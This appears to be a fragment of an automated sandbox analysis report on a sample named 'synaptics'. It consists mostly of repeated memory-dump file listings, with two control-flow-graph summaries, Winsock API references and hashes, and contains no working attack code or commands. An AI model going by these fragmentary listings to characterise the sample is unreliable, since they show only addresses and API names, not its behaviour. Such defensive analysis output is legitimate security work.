                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C770000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C772000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C780000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C791000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B0000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C801000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C820000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C822000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C824000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C826000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C828000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C830000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C832000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C834000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C836000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C838000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C841000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C843000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C854000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C856000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C858000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C85A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C865000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C867000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C869000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C86B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C874000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C876000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C878000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1717984340-0
                                                                                                                                                                                                                                    • Opcode ID: d27d6571dd05ab28df6745bae5fda16ec09f5cb0357c2745da979019f8f73b8f
                                                                                                                                                                                                                                    • Instruction ID: e93b76821314e8fadc272eadd165125920e63bd5f9a8766f3d207690e34722c7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d27d6571dd05ab28df6745bae5fda16ec09f5cb0357c2745da979019f8f73b8f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F412835B4020AAFDF109FA1DD41FEEB7B4EF4A348F140176EA05AB640DB319905CBA9

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 26 73fc5c50-73fc5c82 WSAStartup 27 73fc5c88 26->27 28 73fc67b4 26->28 30 73fc67ad-73fc67b2 27->30 31 73fc5c8e-73fc5c90 27->31 29 73fc67b9 28->29 35 73fc67e8 29->35 36 73fc67bb-73fc67e7 call 73fc6826 29->36 34 73fc67ed-73fc67fa 30->34 32 73fc5c9c-73fc5cb7 31->32 33 73fc5c92-73fc5c97 31->33 40 73fc5cbd-73fc5d44 call 73fc746e 32->40 41 73fc5d49-73fc5d6a 32->41 33->29 42 73fc67fd-73fc6813 call 73fc6826 34->42 35->34 40->41 41->42 50 73fc5d70-73fc5daa 41->50 50->42 55 73fc5db0-73fc5dd5 50->55 55->42 60 73fc5ddb-73fc5e11 55->60 60->42 64 73fc5e17-73fc5e2f 60->64 64->42 66 73fc5e35-73fc5e54 64->66 69 73fc5e5e-73fc5e9c 66->69 70 73fc5e56-73fc5e5c 66->70 73 73fc5e9e-73fc5ea0 call 73fc5bb0 69->73 74 73fc5ecf-73fc5edd 69->74 75 73fc5ea5-73fc5ea8 70->75 73->75 80 73fc5edf-73fc5eec 74->80 81 73fc5f1a-73fc660f 74->81 75->42 77 73fc5eae-73fc5ece call 73fc6826 75->77 83 73fc5eee-73fc5ef1 80->83 84 73fc5ef4-73fc5ef7 80->84 241 73fc6610-73fc6622 81->241 83->84 84->42 85 73fc5efd-73fc5f19 call 73fc6826 84->85 241->42 243 73fc6628-73fc6640 241->243 243->241 245 73fc6642-73fc6680 243->245 251 73fc6686-73fc66ed call 73fc746e 245->251 252 73fc67a0-73fc67a3 245->252 260 73fc66f0-73fc6708 251->260 252->42 254 73fc67a5-73fc67a8 252->254 254->30 262 73fc670a-73fc6718 260->262 263 73fc6783-73fc6799 call 73fc6826 260->263 267 73fc671e-73fc6737 262->267 268 73fc679a 262->268 270 73fc6739-73fc6745 267->270 271 73fc6747 267->271 268->252 272 73fc674d-73fc674f 270->272 271->272 272->252 274 73fc6751-73fc6754 272->274 275 73fc675c-73fc677d 274->275 276 73fc6756-73fc6759 274->276 275->260 275->263 276->275
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000101,?), ref: 73FC5C77
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2203187848.0000000073FC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73FC1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_73fc1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Startup
                                                                                                                                                                                                                                    • String ID: TCP_KEEPIDLE
                                                                                                                                                                                                                                    • API String ID: 724789610-3511322577
                                                                                                                                                                                                                                    • Opcode ID: 1e963aae00eee63d2528c584e48f773686458ab756019a551faf6a16834318ba
                                                                                                                                                                                                                                    • Instruction ID: c97853449a67c3c79e8e1b11018cee49f3ad3510157c83ff5628d39e28726f1d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e963aae00eee63d2528c584e48f773686458ab756019a551faf6a16834318ba
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC5270307C1696FEF21267204C85FEF36989F467D9F000614FEA57E1C2EB69DA0149AE

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 290 6c71b890-6c71b8b4 WSASetLastError send 291 6c71b8bb-6c71b8c0 290->291 292 6c71b8c2-6c71b8cd 291->292 293 6c71b8da-6c71b8de 291->293 292->293 295 6c71b8cf-6c71b8d7 292->295 295->293
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 6C71B894
                                                                                                                                                                                                                                    • send.WS2_32(?,?,?,00000000), ref: 6C71B8AB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C760000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C762000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C764000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C766000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C768000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C770000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C772000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C780000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C791000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B0000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C801000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C820000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C822000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C824000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C826000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C828000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C830000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C832000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C834000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C836000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C838000.00000020.00000001.01000000.0000000D.sdmpDownload File
